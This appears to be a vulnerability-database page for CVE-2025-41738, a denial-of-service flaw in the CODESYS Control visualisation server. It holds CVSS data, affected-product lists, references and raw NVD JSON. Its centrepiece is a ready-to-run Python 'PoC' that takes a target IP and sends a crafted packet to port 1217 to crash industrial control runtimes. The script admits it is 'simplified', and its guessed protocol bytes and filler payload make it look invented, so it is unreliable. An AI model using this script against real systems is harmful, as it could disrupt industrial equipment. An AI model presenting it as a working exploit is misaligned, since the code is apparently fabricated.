CVE-2025-41738

Description

An unauthenticated remote attacker may cause the visualisation server of the CODESYS Control runtime system to access a resource with a pointer of wrong type, potentially leading to a denial-of-service (DoS) condition.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:codesys:control_for_beaglebone_sl:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:codesys:control_for_empc-a\/imx6_sl:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:codesys:control_for_iot2000_sl:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:codesys:control_for_linux_arm_sl:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:codesys:control_for_linux_sl:*:*:*:*:*:*:*:* - VULNERABLE

CODESYS Control (具体版本需参考官方公告)

CODESYS Control runtime system (所有受影响的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-41738 PoC - CODESYS Control Visualisation Server DoS
# Target: CODESYS Control runtime system visualisation server
# Attack: Send malformed request causing type confusion

import socket
import struct
import sys

def create_malformed_packet():
    # Construct a malformed packet that triggers type confusion
    # This is a simplified example - actual exploitation may require protocol-specific crafting
    header = b'\x03\x00'  # CODESYS protocol header
    packet_type = b'\x0a\x00'  # Visualisation request type
    
    # Malformed data causing type confusion
    malformed_data = b'\x41' * 100  # Padding with specific pattern
    
    # Craft the complete packet
    packet = header + packet_type + malformed_data
    return packet

def exploit_cve_2025_41738(target_ip, target_port=1217):
    print(f"[*] Targeting {target_ip}:{target_port}")
    print(f"[*] Exploiting CVE-2025-41738: CODESYS Control Visualisation Server DoS")
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        # Send malformed packet
        packet = create_malformed_packet()
        sock.send(packet)
        print(f"[+] Malformed packet sent successfully")
        print(f"[*] Target may crash or become unresponsive")
        
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 1217
    exploit_cve_2025_41738(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41738
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41738
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41738/
[4] VulDB https://vuldb.com/cve/CVE-2025-41738
[5] https://certvde.com/de/advisories/VDE-2025-100

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41738", "sourceIdentifier": "[email protected]", "published": "2025-12-01T10:16:01.130", "lastModified": "2026-02-23T15:42:30.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated remote attacker may cause the visualisation server of the CODESYS Control runtime system to access a resource with a pointer of wrong type, potentially leading to a denial-of-service (DoS) condition."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_beaglebone_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "AC30C449-D8D5-4789-875B-770BA22CB50A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_empc-a\\/imx6_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndIncluding": "4.19.0.0", "matchCriteriaId": "A00DF2DC-04B9-498C-9AF0-1205A45A104C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_iot2000_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "C245753D-52F6-4B11-8724-8DC05C7149F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_linux_arm_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "4B16CF88-9B70-4B28-92AB-F5CD49ADE513"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_linux_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "9D4B874C-2402-4208-85B8-EBC03D092678"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_pfc100_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndIncluding": "4.19.0.0", "matchCriteriaId": "B0B3369D-A9E4-4362-8A2B-947C6B89C4A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_pfc200_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "BA58388A-4084-47CB-8078-2B3405DA3D95"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_plcnext_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "15F6992D-80C0-43FE-AFD3-241F1F44B078"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_raspberry_pi_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "9F9F69C3-3C0A-4D08-94EE-C9FFD21FD89E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_for_wago_touch_panels_600_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndIncluding": "4.19.0.0", "matchCriteriaId": "53BE2A4B-940C-499C-854F-CD8B99FD4EB5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_rte_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "E36769BE-B465-450C-B584-075E969CE608"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_rte_sl_\\(for_beckhoff_cx\\):*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "D8CCA570-A3CE-46CF-BBD1-384DFBD8DA4C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:control_win_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "827EB8A7-01B0-4414-A20C-6B2FABF9E384"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:hmi_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "897A1436-7A4E-4AF2-8A62-77DA592321F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:remote_target_visu:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "4E7C54E1-5F4B-4436-BEF7-F86EB783D1F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:runtime_toolkit:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.18.0", "versionEndExcluding": "3.5.21.40", "matchCriteriaId": "C5DC5E0B-5D9A-4A6D-8894-97EF707151EF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codesys:virtual_control_sl:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0.0", "versionEndExcluding": "4.19.0.0", "matchCriteriaId": "492FCFE5-1A20-494D-A872-A5FAF463EE30"}]}]}], "references": [{"url": ... (truncated)